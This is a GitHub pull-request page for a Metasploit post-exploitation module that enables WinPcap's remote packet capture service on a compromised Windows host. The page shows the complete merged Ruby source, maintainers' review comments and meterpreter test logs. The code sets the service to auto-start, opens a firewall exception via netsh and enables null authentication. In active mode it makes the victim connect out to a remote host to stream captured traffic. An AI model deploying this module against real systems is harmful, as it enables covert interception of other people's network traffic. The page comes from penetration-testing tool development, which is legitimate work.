Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

Post windows module to start rpcapd service (active/pasive mode) #761

Merged
merged 3 commits into from

3 participants

Borja Merino Juan Vazquez James Lee
Borja Merino

The module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall).

modules/post/windows/manage/rpcapd_start.rb
((27 lines not shown))
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
James Lee Collaborator
jlee-r7 added a note

Modules should not run getsystem. Check for necessary privileges and tell the user if they need to run it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/post/windows/manage/rpcapd_start.rb
((35 lines not shown))
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
James Lee Collaborator
jlee-r7 added a note

Artificial restriction. This is a fairly simple task that should work just fine on java or a shell session.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/post/windows/manage/rpcapd_start.rb
((88 lines not shown))
+ print_good("Got System")
+ return true
+ else
+ print_error("Couldn't get System")
+ return false
+ end
+ elsif !is_admin? and datastore['GETSYSTEM']==false
+ return false
+ else # is_admin? = true
+ return true
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ client.sys.process.execute("cmd.exe /c sc config rpcapd binpath= \"#{p}\" ",nil, {'Hidden' => 'true', 'Channelized' => true})
James Lee Collaborator
jlee-r7 added a note

You should avoid process.execute when cmd_exec will do (i.e., unless you need to use a token). Using process.execute means this can't run on a shell session.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/post/windows/manage/rpcapd_start.rb
((109 lines not shown))
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if (client.fs.file.exists?(prog))
James Lee Collaborator
jlee-r7 added a note

use the methods from Post::File which are platform and session type independent.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/post/windows/manage/rpcapd_start.rb
((44 lines not shown))
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=client.fs.file.expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
James Lee Collaborator
jlee-r7 added a note

use expand_path from the Post::File mixin instead.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Borja Merino

Hi @jlee-r7 thanks for all the explanations

Juan Vazquez
Collaborator

Tested successfully:

msf  exploit(handler) > use post/windows/manage/rpcapd_start 
msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > show sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.1.129:4444 -> 192.168.1.147:1743 (192.168.1.147)

msf  post(rpcapd_start) > set SESSION 1
SESSION => 1
msf  post(rpcapd_start) > run

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed

After that I'm able to connect to the remote interface on the port 2002 and capture traffic from a remote host.

Borja Merino

@jvazquez-r7 Thank you so much for checking it out

modules/post/windows/manage/rpcapd_start.rb
((49 lines not shown))
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ print_error("RHOST is not set ") if datastore['RHOST']==nil
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
Juan Vazquez Collaborator

As @jlee-r7 has pointed, could happen that RHOST is nil. It doesn't seem to have sense when running in active mode, has it?

If RHOST is always needed to run in active mode, in case of RHOST being nil, just print_error to warn the user and return.

Thanks @jlee-r7 for keep pointing!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/post/windows/manage/rpcapd_start.rb
((17 lines not shown))
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
Juan Vazquez Collaborator

Can MSF_LICENSE be used? of you would like to use BSD_LICENSE?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Borja Merino

@jvazquez-r7 yes of course MSF_LICENSE, I was wrong to write it and I've just seen that I also put BSD_LICENCE in the safe delete (sdel). Could you please change it?

Thank you

Juan Vazquez
Collaborator

@bmerinofe sure I can change the license type for you when merging, no problem! :)

Is there any response for the comment about the RHOST being nil in the active mode? (see above :) )

Juan Vazquez
Collaborator

Awesome, looks good! and works as expected, merging!

msf  post(rpcapd_start) > show options

Module options (post/windows/manage/rpcapd_start):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.

msf  post(rpcapd_start) > set session 1
session => 1
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed
msf  post(rpcapd_start) > set ACTIVE true
ACTIVE => true
msf  post(rpcapd_start) > rexploit
[*] Reloading module...

[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[-] RHOST is not set 
[*] Post module execution completed

Juan Vazquez jvazquez-r7 merged commit cdd9eb1 into from
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Sep 5, 2012
  1. Borja Merino
Commits on Sep 7, 2012
  1. Borja Merino

    Applying changes

    BorjaMerino authored
Commits on Nov 28, 2012
  1. Borja Merino
This page is out of date. Refresh to see the latest.
Showing with 117 additions and 0 deletions.
  1. +117 −0 modules/post/windows/manage/rpcapd_start.rb
117 modules/post/windows/manage/rpcapd_start.rb
View
@@ -0,0 +1,117 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/post/file'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/post/windows/services'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ if is_admin?
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ if datastore['RHOST']==nil
+ print_error("RHOST is not set ")
+ return
+ else
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
+ print_status("Installing rpcap in ACTIVE mode (remote port: #{datastore['PORT']})")
+ end
+ else
+ fw_enable(prog)
+ print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ")
+ p = prog << " -d -p #{datastore['PORT']} "
+ end
+ if datastore['NULLAUTH']==true
+ p<< "-n"
+ end
+ run_rpcapd(p)
+ end
+ else
+ print_error("You don't have enough privileges. Try getsystem.")
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ cmd_exec("sc","config rpcapd binpath= \"#{p}\" ",30)
+ result=service_start("rpcapd")
+ case result
+ when 0
+ print_good("Rpcapd started successfully: #{p}")
+ when 1
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if file_exist?(prog)
+ cmd_exec("netsh","firewall add allowedprogram \"#{prog}\" \"Windows Service\" ENABLE ",30)
+ else
+ print_error("rpcad.exe doesn't exist in #{prog}. Check the installation of WinPcap")
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+end
Something went wrong with that request. Please try again.